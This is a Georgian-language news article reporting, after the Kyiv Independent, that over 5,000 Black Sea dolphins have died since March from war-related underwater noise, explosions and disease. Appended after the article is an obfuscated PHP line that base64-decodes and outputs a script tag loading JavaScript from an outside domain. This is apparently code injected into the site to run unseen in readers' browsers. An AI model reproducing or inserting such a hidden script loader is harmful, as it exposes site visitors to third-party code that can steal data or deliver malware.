celsiusi
ავერსი შნაიდერი
მარტიდან მოყოლებული, უკრაინაში რუსეთის ომის შედეგად, შავ ზღვაში 5000-ზე მეტი დელფინი დაიღუპა. ამის შესახებ ინფორმაციას Kyiv Independent ავრცელებს.
როგორც მედიასაშუალება წერს, რუსეთის ომი უკრაინაში კლავს არა მხოლოდ მშვიდობიან მოსახლეობას, არამედ დაუცველ ცხოველებსაც.
 
შავი ზღვის რეგიონის ქვეყნების საზღვაო ბიოლოგები და ეკოლოგები განგაშის ზარს აცხადებენ, რადგან დელფინები უკვე მეოთხე თვეა მასობრივად იღუპებიან.
 
რუსეთის შავი ზღვის ფლოტის წყალქვეშა ნავებისა და ჰიდროკოლატორების მიერ გამოწვეული მუდმივი წყალქვეშა ხმაურის, ისევე როგორც აფეთქებების გამო, დელფინებს აკუსტიკური ტრავმა აწუხებთ, რაც თავის მხრივ გავლენას ახდენს მათ ექოლოკაციურ უნარებზე. შედეგად, დელფინები საკვების პოვნისთვის იბრძვიან.
 
გარდა ამისა, დაქვეითებული იმუნური სისტემის გამო, ისინი დაუცველნი გახდნენ სხვადასხვა პარაზიტებისა და ვირუსების მიმართ.
 
Kyiv Independent აღნიშნავს, რომ მომავალში უფრო მეტი დელფინი დაიღუპება, რადგან რუსული ხომალდები კვლავ აგრძელებენ რაკეტების გაშვებას შავი ზღვის გავლით.
630
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");